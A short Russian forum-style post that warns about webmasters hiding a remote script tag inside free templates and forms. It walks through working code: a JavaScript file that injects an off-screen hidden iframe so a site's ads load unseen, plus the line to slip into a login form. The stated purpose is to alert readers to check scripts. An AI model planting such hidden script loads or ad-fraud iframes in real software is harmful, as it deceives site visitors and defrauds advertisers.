Сегодня зашёл на o-ucoze и увидел, что там находится вирус, а точнее ссылка на javascript, подгружающий вирус.
Впрочем, меня это ничуть не удивляет. Всё дело в ушлых вебмастерах. Добиться вставки вируса очень просто - написать клёвый скрипт или шаблон, а в серединку, чтобы было незаметно, строчку:
Code
<script src="http://site.ru/javascript.js" type="text/javascript"></script>
А уж что будет, в этом javascript.js, решает владелец сайта.
Наиболее популярный на данный момент - заработок на рекламе за счёт другого сайта. К примеру, вы создали некий сайт с названием mysite.ru. Далее, вы открываете блокнот и пишите:
Code
var frame = document.createElement('ifr'+'ame');
frame.style.position = 'absolute';
frame.style.left = '-1000px';
frame.src='http://mysite.ru';
document.body.appendChild(frame);
Сохраняете файл, как "javascript.js" и загружаете в корень.
Затем берёте любой скрипт, ну например, форма входа. Вставляете между двумя строчками код:
Code
<script src="http://mysite.ru/javascript.js" type="text/javascript"></script>
И всё! Обвешиваете свой сайт рекламой, а страница будет грузиться в фрейме, который не будет виден визуально, из-за строчки:
Code
frame.style.left = '-1000px';
Зато, вся реклама будет грузиться. Вот так вот обманывают пользователей. Поэтому тщательно проверяйте на наличие такой фигни каждый скрипт, который вы устанавливаете.